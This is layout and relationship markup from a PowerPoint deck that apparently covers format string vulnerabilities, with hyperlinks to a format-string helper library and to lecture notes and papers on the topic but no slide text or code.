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176"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="380" r:id="rId4"/>
    <p:sldId id="381" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="323" r:id="rId10"/>
    <p:sldId id="343" r:id="rId11"/>
    <p:sldId id="322" r:id="rId12"/>
    <p:sldId id="326" r:id="rId13"/>
    <p:sldId id="341" r:id="rId14"/>
    <p:sldId id="384" r:id="rId15"/>
    <p:sldId id="325" r:id="rId16"/>
    <p:sldId id="342" r:id="rId17"/>
    <p:sldId id="324" r:id="rId18"/>
    <p:sldId id="345" r:id="rId19"/>
    <p:sldId id="383" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="295" r:id="rId23"/>
    <p:sldId id="296" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="318" r:id="rId27"/>
    <p:sldId id="328" r:id="rId28"/>
    <p:sldId id="269" r:id="rId29"/>
    <p:sldId id="261" r:id="rId30"/>
    <p:sldId id="351" r:id="rId31"/>
    <p:sldId id="329" r:id="rId32"/>
    <p:sldId id="475" r:id="rId33"/>
    <p:sldId id="352" r:id="rId34"/>
    <p:sldId id="353" r:id="rId35"/>
    <p:sldId id="354" r:id="rId36"/>
    <p:sldId id="355" r:id="rId37"/>
    <p:sldId id="356" r:id="rId38"/>
    <p:sldId id="357" r:id="rId39"/>
    <p:sldId id="358" r:id="rId40"/>
    <p:sldId id="277" r:id="rId41"/>
    <p:sldId id="278" r:id="rId42"/>
    <p:sldId id="279" r:id="rId43"/>
    <p:sldId id="280" r:id="rId44"/>
    <p:sldId id="281" r:id="rId45"/>
    <p:sldId id="282" r:id="rId46"/>
    <p:sldId id="283" r:id="rId47"/>
    <p:sldId id="284" r:id="rId48"/>
    <p:sldId id="285" r:id="rId49"/>
    <p:sldId id="286" r:id="rId50"/>
    <p:sldId id="287" r:id="rId51"/>
    <p:sldId id="288" r:id="rId52"/>
    <p:sldId id="289" r:id="rId53"/>
    <p:sldId id="290" r:id="rId54"/>
    <p:sldId id="291" r:id="rId55"/>
    <p:sldId id="344" r:id="rId56"/>
    <p:sldId id="346" r:id="rId57"/>
    <p:sldId id="347" r:id="rId58"/>
    <p:sldId id="359" r:id="rId59"/>
    <p:sldId id="373" r:id="rId60"/>
    <p:sldId id="360" r:id="rId61"/>
    <p:sldId id="263" r:id="rId62"/>
    <p:sldId id="320" r:id="rId63"/>
    <p:sldId id="375" r:id="rId64"/>
    <p:sldId id="376" r:id="rId65"/>
    <p:sldId id="377" r:id="rId66"/>
    <p:sldId id="393" r:id="rId67"/>
    <p:sldId id="394" r:id="rId68"/>
    <p:sldId id="395" r:id="rId69"/>
    <p:sldId id="396" r:id="rId70"/>
    <p:sldId id="386" r:id="rId71"/>
    <p:sldId id="305" r:id="rId72"/>
    <p:sldId id="385" r:id="rId73"/>
    <p:sldId id="330" r:id="rId74"/>
    <p:sldId id="331" r:id="rId75"/>
    <p:sldId id="332" r:id="rId76"/>
    <p:sldId id="333" r:id="rId77"/>
    <p:sldId id="334" r:id="rId78"/>
    <p:sldId id="335" r:id="rId79"/>
    <p:sldId id="336" r:id="rId80"/>
    <p:sldId id="337" r:id="rId81"/>
    <p:sldId id="338" r:id="rId82"/>
    <p:sldId id="339" r:id="rId83"/>
    <p:sldId id="340" r:id="rId84"/>
    <p:sldId id="433" r:id="rId85"/>
    <p:sldId id="374" r:id="rId86"/>
    <p:sldId id="388" r:id="rId87"/>
    <p:sldId id="389" r:id="rId88"/>
    <p:sldId id="390" r:id="rId89"/>
    <p:sldId id="391" r:id="rId90"/>
    <p:sldId id="392" r:id="rId91"/>
    <p:sldId id="372" r:id="rId92"/>
    <p:sldId id="382" r:id="rId93"/>
    <p:sldId id="425" r:id="rId94"/>
    <p:sldId id="426" r:id="rId95"/>
    <p:sldId id="427" r:id="rId96"/>
    <p:sldId id="428" r:id="rId97"/>
    <p:sldId id="429" r:id="rId98"/>
    <p:sldId id="378" r:id="rId99"/>
    <p:sldId id="430" r:id="rId100"/>
    <p:sldId id="431" r:id="rId101"/>
    <p:sldId id="432" r:id="rId102"/>
    <p:sldId id="405" r:id="rId103"/>
    <p:sldId id="406" r:id="rId104"/>
    <p:sldId id="262" r:id="rId105"/>
    <p:sldId id="407" r:id="rId106"/>
    <p:sldId id="408" r:id="rId107"/>
    <p:sldId id="409" r:id="rId108"/>
    <p:sldId id="410" r:id="rId109"/>
    <p:sldId id="411" r:id="rId110"/>
    <p:sldId id="412" r:id="rId111"/>
    <p:sldId id="413" r:id="rId112"/>
    <p:sldId id="414" r:id="rId113"/>
    <p:sldId id="415" r:id="rId114"/>
    <p:sldId id="416" r:id="rId115"/>
    <p:sldId id="417" r:id="rId116"/>
    <p:sldId id="418" r:id="rId117"/>
    <p:sldId id="419" r:id="rId118"/>
    <p:sldId id="420" r:id="rId119"/>
    <p:sldId id="421" r:id="rId120"/>
    <p:sldId id="422" r:id="rId121"/>
    <p:sldId id="423" r:id="rId122"/>
    <p:sldId id="424" r:id="rId123"/>
    <p:sldId id="387" r:id="rId124"/>
    <p:sldId id="264" r:id="rId125"/>
    <p:sldId id="434" r:id="rId126"/>
    <p:sldId id="436" r:id="rId127"/>
    <p:sldId id="438" r:id="rId128"/>
    <p:sldId id="439" r:id="rId129"/>
    <p:sldId id="440" r:id="rId130"/>
    <p:sldId id="441" r:id="rId131"/>
    <p:sldId id="442" r:id="rId132"/>
    <p:sldId id="463" r:id="rId133"/>
    <p:sldId id="443" r:id="rId134"/>
    <p:sldId id="444" r:id="rId135"/>
    <p:sldId id="450" r:id="rId136"/>
    <p:sldId id="462" r:id="rId137"/>
    <p:sldId id="464" r:id="rId138"/>
    <p:sldId id="445" r:id="rId139"/>
    <p:sldId id="465" r:id="rId140"/>
    <p:sldId id="466" r:id="rId141"/>
    <p:sldId id="467" r:id="rId142"/>
    <p:sldId id="468" r:id="rId143"/>
    <p:sldId id="469" r:id="rId144"/>
    <p:sldId id="470" r:id="rId145"/>
    <p:sldId id="471" r:id="rId146"/>
    <p:sldId id="472" r:id="rId147"/>
    <p:sldId id="473" r:id="rId148"/>
    <p:sldId id="446" r:id="rId149"/>
    <p:sldId id="447" r:id="rId150"/>
    <p:sldId id="449" r:id="rId151"/>
    <p:sldId id="451" r:id="rId152"/>
    <p:sldId id="452" r:id="rId153"/>
    <p:sldId id="453" r:id="rId154"/>
    <p:sldId id="454" r:id="rId155"/>
    <p:sldId id="455" r:id="rId156"/>
    <p:sldId id="456" r:id="rId157"/>
    <p:sldId id="457" r:id="rId158"/>
    <p:sldId id="474" r:id="rId159"/>
    <p:sldId id="460" r:id="rId160"/>
    <p:sldId id="461" r:id="rId161"/>
    <p:sldId id="348" r:id="rId162"/>
    <p:sldId id="350" r:id="rId163"/>
    <p:sldId id="367" r:id="rId164"/>
    <p:sldId id="368" r:id="rId165"/>
    <p:sldId id="379" r:id="rId166"/>
    <p:sldId id="369" r:id="rId167"/>
    <p:sldId id="370" r:id="rId168"/>
    <p:sldId id="349" r:id="rId169"/>
    <p:sldId id="361" r:id="rId170"/>
    <p:sldId id="362" r:id="rId171"/>
    <p:sldId id="363" r:id="rId172"/>
    <p:sldId id="364" r:id="rId173"/>
    <p:sldId id="365" r:id="rId174"/>
    <p:sldId id="366" r:id="rId17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o ruizhi" initials="zr" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="82544d48ebd1909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C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DFDB"/>
    <a:srgbClr val="C5CAE9"/>
    <a:srgbClr val="9FA8DA"/>
    <a:srgbClr val="F0F4C3"/>
    <a:srgbClr val="C8E6C9"/>
    <a:srgbClr val="FFE0B2"/>
    <a:srgbClr val="FFCC80"/>
    <a:srgbClr val="FFECB3"/>
    <a:srgbClr val="C0F2DF"/>
    <a:srgbClr val="BEF4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53" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="200" d="100"/>
          <a:sy n="200" d="100"/>
        </p:scale>
        <p:origin x="-3903" y="-232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commentAuthors" Target="commentAuthors.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theme" Target="theme/theme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notesMaster" Target="notesMasters/notes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0247AF-5B5C-4147-BFFB-F12477DB49FD}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/3/25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3F1BA8-EAFB-4D5B-B18D-35D07B5B660D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891927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Shape 6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0" name="Shape 6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8201074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67864525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4419430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928895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19604558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08316348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79647706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0144063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97667306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10773471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320390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7013730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865362836"/>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940273602"/>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532729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Shape 2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4" name="Shape 2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9" name="Shape 3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5" name="Shape 3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9" name="Shape 3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7" name="Shape 3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Shape 6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5" name="Shape 6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Shape 4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4" name="Shape 4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1" name="Shape 4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Shape 4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8" name="Shape 4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6" name="Shape 5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Shape 5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3" name="Shape 5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0" name="Shape 5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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1586" name="Shape 15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7" name="Shape 15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Shape 16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1" name="Shape 16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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1635" name="Shape 16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6" name="Shape 16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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1661" name="Shape 16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2" name="Shape 16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681896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Shape 8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5" name="Shape 8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Shape 8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5" name="Shape 8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409167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Shape 8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5" name="Shape 8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Shape 8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2" name="Shape 8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Shape 8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0" name="Shape 8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Shape 8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9" name="Shape 8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Shape 9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8" name="Shape 9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Shape 9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6" name="Shape 9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Shape 9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5" name="Shape 9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4" name="Shape 9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9394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Shape 9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9" name="Shape 9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Shape 9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4" name="Shape 9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Shape 10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1" name="Shape 10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Shape 10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1" name="Shape 10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0107496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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Shape 14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3" name="Shape 14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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1440" name="Shape 14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1" name="Shape 14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Shape 1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2" name="Shape 14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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Shape 1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3" name="Shape 14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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1505" name="Shape 15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6" name="Shape 15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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1706" name="Shape 17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7" name="Shape 17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78675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661212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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1729" name="Shape 17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0" name="Shape 17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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1737" name="Shape 17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8" name="Shape 17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Shape 17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8" name="Shape 17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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777" name="Shape 17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8" name="Shape 17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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1797" name="Shape 17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8" name="Shape 17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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1827" name="Shape 18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8" name="Shape 18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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1857" name="Shape 18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8" name="Shape 18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Shape 18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9" name="Shape 18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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1919" name="Shape 19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0" name="Shape 19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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1994" name="Shape 19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5" name="Shape 19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2958855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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2020" name="Shape 20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1" name="Shape 20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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2030" name="Shape 20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1" name="Shape 20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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2037" name="Shape 20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8" name="Shape 20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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2045" name="Shape 20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6" name="Shape 20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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Shape 20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2" name="Shape 20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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2057" name="Shape 20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8" name="Shape 20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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2063" name="Shape 20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4" name="Shape 20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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2069" name="Shape 20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0" name="Shape 20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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2075" name="Shape 20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6" name="Shape 20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047161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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2081" name="Shape 20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2" name="Shape 20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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2094" name="Shape 20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5" name="Shape 20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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2101" name="Shape 2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2" name="Shape 2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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2107" name="Shape 2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8" name="Shape 2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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2113" name="Shape 2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4" name="Shape 21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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2119" name="Shape 2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0" name="Shape 2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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2125" name="Shape 2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6" name="Shape 21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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2131" name="Shape 2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2" name="Shape 2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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2138" name="Shape 2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9" name="Shape 21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288844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9274087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78065593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63672630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90496264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7241054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04866405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62783233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30889913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0884009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80781674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33496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7408156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4571171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7873355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56741887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21733877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61791724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43954076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03722768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4519289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8455792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Shape 20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1" name="Shape 20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043100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30B5286-7DC6-4515-8C85-93EFF4C090F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10889"/>
            <a:ext cx="12192000" cy="400108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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199716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blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718027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3295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userDrawn="1">
  <p:cSld name="1_Title and body">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2447291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4290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userDrawn="1">
  <p:cSld name="1_Title and body">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15322077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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2320449342"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="dk2" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483689" r:id="rId1"/>
    <p:sldLayoutId id="2147483678" r:id="rId2"/>
    <p:sldLayoutId id="2147483688" r:id="rId3"/>
    <p:sldLayoutId id="2147483690" r:id="rId4"/>
    <p:sldLayoutId id="2147483650" r:id="rId5"/>
    <p:sldLayoutId id="214748370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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hellman/libformatstr" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide78.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf" TargetMode="Externa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5992F9D-07E8-4BC5-9060-9AD44D5160EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1859340"/>
            <a:ext cx="3331361" cy="1569660"/>
